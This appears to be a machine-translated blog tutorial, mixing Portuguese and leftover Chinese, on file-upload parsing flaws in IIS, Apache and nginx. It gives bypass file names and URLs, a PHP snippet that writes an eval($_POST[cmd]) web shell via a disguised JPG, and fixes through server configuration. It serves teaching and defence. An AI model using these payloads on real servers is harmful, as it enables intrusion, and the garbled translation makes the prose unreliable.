download de arquivo inseguro e upload - A vulnerabilidade upload do servidor de vulnerabilidade de análise

vulnerabilidade upload do servidor de vulnerabilidade de análise

Carregar brechas IIS5.x-6.x vulnerabilidade de análise

Use versão iis5.x-6.x do servidor, principalmente do Windows Server
2003, o site mais antigo, desenvolvido declarações geralmente asp; a vulnerabilidade de análise só pode ser resolvido arquivos asp, não analisar o arquivo aspx.

parsing Directory (6,0)

		形式:www.xxx.com/xx.asp/xx.jpg
		原理: 服务器默认会把.asp,.asa目录下的文件都解析成asp文件。

análise de arquivo

		形式:www.xxx.com/xx.asp;.jpg
		原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg便被解析成asp文件了。

Analisando o tipo de arquivo

		IIS6.0 默认的可执行文件除了asp还包含这三种 :
			/test.asa
			/test.cer
			/test.cdx

programa de reabilitação

		1.目前尚无微软官方的补丁,可以通过自己编写正则,阻止上传xx.asp;.jpg类型的文件名。
		2.做好权限设置,限制用户创建文件夹。

Apache brechas de upload vulnerabilidade de análise

princípio vulnerabilidades

Regra Apache analisar o arquivo é da direita para a esquerda para começar a analisar para determinar se o sufixo análise de arquivo não reconhecido, e, em seguida, ser deixada para juiz. Por exemplo test.php.owf.rar
".owf" e ".rar" sufixo dois apache análise irreconhecível, apache será analisado no php oldboy.php.owf.rar.

formulário de vulnerabilidade

		www.xxxx.xxx.com/test.php.php123

Os problemas de configuração restantes que levam à vulnerabilidade

(1) Se houver tal uma linha AddHandler configuração .php php5-script no conf Apache em
Neste caso, desde que o nome do arquivo contém um nome de arquivo .php é test2.php.jpg mesmo com php será realizada.
(2) se houver tal linha uma disposta no Apache conf AddType aplicação / x-httpd-php .jpg mesmo se a extensão é jpg, php pode ser realizada da mesma maneira.

programa de reabilitação

		1.apache配置文件,禁止.php.这样的文件执行,配置文件里面加入
<Files ~.(php.|php3.)>
        Order Allow,Deny
        Deny from all
</Files>

2. pseudo-estática para resolver este problema, substituir .php similar. * Esse documento, abra o apache httpd.conf encontrar módulos LoadModule rewrite_module / mod_rewrite.so
o número # removido, reiniciar o apache, construído no diretório raiz do site. htaccess, como segue:

	<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .(php.|php3.) /index.php
RewriteRule .(pHp.|pHp3.) /index.php
RewriteRule .(phP.|phP3.) /index.php
RewriteRule .(Php.|Php3.) /index.php
RewriteRule .(PHp.|PHp3.) /index.php
RewriteRule .(PhP.|PhP3.) /index.php
RewriteRule .(pHP.|pHP3.) /index.php
RewriteRule .(PHP.|PHP3.) /index.php
</IfModule>

nginx vulnerabilidade de upload de vulnerabilidade de análise

princípio vulnerabilidades

		  Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问www.xx.com/phpinfo.jpg/1.php这个URL时,$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”,然后构造成SCRIPT_FILENAME传递给PHP CGI,但是PHP为什么会接受这样的参数,并将phpinfo.jpg作为PHP文件解析呢?这就要说到fix_pathinfo这个选项了。 如果开启了这个选项,那么就会触发在PHP中的如下逻辑:
			PHP会认为SCRIPT_FILENAME是phpinfo.jpg,而1.php是PATH_INFO,所以就会将phpinfo.jpg作为PHP文件来解析了

formulário de vulnerabilidade

		www.xxxx.com/UploadFiles/image/1.jpg/1.php
		www.xxxx.com/UploadFiles/image/1.jpg%00.php
		www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php
		xxx.jpg%00.php (Nginx <8.03 空字节代码执行漏洞)
	另外一种手法:上传一个名字为test.jpg,以下内容的文件。


<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
			然后访问test.jpg/.php,在这个目录下就会生成一句话木马shell.php。

programa de reabilitação

		1.修改php.ini文件,将cgi.fix_pathinfo的值设置为0;
		2.在Nginx配置文件中添加以下代码:
		if ( $fastcgi_script_name ~ ..*/.*php ) 
{
return 403;
}

meios Esta linha que, quando o URL corresponde a test.jpg semelhante / a.php irá retornar um código de erro 403. Carregar brechas IIS7.5 8 Análise de Vulnerabilidade
IIS7.5 vulnerabilidade com nginx semelhante, são devido arquivo de configuração do PHP, abra o cgi.fix_pathinfo, que não é nginx ou a própria vulnerabilidade iis7.5.
https://www.xp.cn/a.php/182.html
Quando a instalação estiver concluída, php.ini em cgi.fix_pathinfo default = 1, é hora de visita, quando a extensão caminho URL irá adicionar .php como um arquivo php é analisado, as vulnerabilidades resultantes
Nota: Antes do teste real, achei brechas e não mais tarde descobriu ser partiu FastCGI, que parece ser usado para processar o arquivo de dados
quando a defesa put cgi. fix_pathinfo = 0, e FastCGI aberta para que, desde que você pode jogar ponto de alto nível
para criar o conteúdo do arquivo cmd.txt

<?php
				fputs(fopen('shell.php','w'),'<?php  phpinfo();?>');
				//创建新的文件
				?>
		保存后,重命名为cmd.jpg 文件
		再次进行访问

Preste atenção

			当phpstudy切换回去的时候,不一定可以运行,需要进行再配置
Publicado 80 artigos originais · ganhou elogios 8 · vista 4213

Acho que você gosta

Origin blog.csdn.net/weixin_43079958/article/details/105377290
Recomendado
Clasificación